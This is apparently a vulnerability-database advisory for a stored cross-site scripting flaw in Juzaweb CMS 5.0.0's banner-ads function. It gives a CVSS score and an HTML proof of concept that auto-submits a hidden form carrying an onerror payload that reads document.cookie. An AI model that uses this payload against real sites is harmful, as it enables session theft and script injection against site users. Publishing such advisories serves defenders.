Cross Site Scripting vulnerability in Juzaweb CMS v.5.0.0 allows a remote attacker via execute arbitrary code via a crafted script to the Add Banner Ads function
CVSS Details
CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
Juzaweb CMS 5.0.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-36358 -->
<!-- Description: Inject XSS payload via the Add Banner Ads function -->
<html>
<body>
<form action="http://target.com/admin/banner-ads" method="POST">
<input type="hidden" name="title" value="Malicious Ad" />
<input type="hidden" name="type" value="code" />
<!-- Payload containing script to execute alert -->
<input type="hidden" name="content" value="<img src=x onerror=alert(document.cookie)>" />
<input type="submit" value="Submit" />
</form>
<script>
// Auto-submit the form for demonstration
document.forms[0].submit();
</script>
</body>
</html>